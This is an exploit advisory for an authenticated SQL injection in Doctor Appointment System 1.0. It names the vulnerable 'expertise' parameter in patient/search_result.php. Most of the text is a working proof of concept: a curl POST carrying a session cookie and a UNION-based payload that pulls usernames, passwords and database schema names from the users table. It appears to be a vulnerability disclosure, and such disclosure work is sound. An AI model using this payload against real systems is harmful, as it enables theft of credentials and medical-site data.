Doctor Appointment System 1.0 SQL Injection

`# Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection  
# Date: 2021-02-09  
# Exploit Author: Soham Bakore, Nakul Ratti  
# Vendor Homepage:  
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html  
# Software Link:  
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html  
# Version: V1.0  
  
  
Vulnerable File:  
----------------  
http://host/patient/search_result.php  
  
Vulnerable Issue:  
-----------------  
Expertise parameter has no input validation  
  
POC:  
----  
1] Login as a normal patient user  
2] Insert cookie after successful login in the below command:  
curl -i -s -o tmp -k -X $'POST' \  
-H $'Host: 192.168.1.12' -H $'Content-Type:  
application/x-www-form-urlencoded' -H $'Content-Length: 288' -H  
$'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' -H  
$'Upgrade-Insecure-Requests: 1' \  
-b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \  
--data-binary  
$'expertise=Bone\'+union+select+concat(\'Username-\',username),2,3,(select+(%40a)+from+(select(%40a%3a%3d0x00),(select+(%40a)+from+(information_schema.schemata)where+(%40a)in+(%40a%3a%3dconcat(%40a,schema_name,\'<br>\'))))a),concat(\'Password\',\'-\',password),6,7,8,9,10,11,12+from+users%23&submit='  
\  
$'http://host/patient/search_result.php'  
3] Check the tmp file for sensitive information from the database.  
------------------  
  
  
Kindly let us know if any other information is required.  
`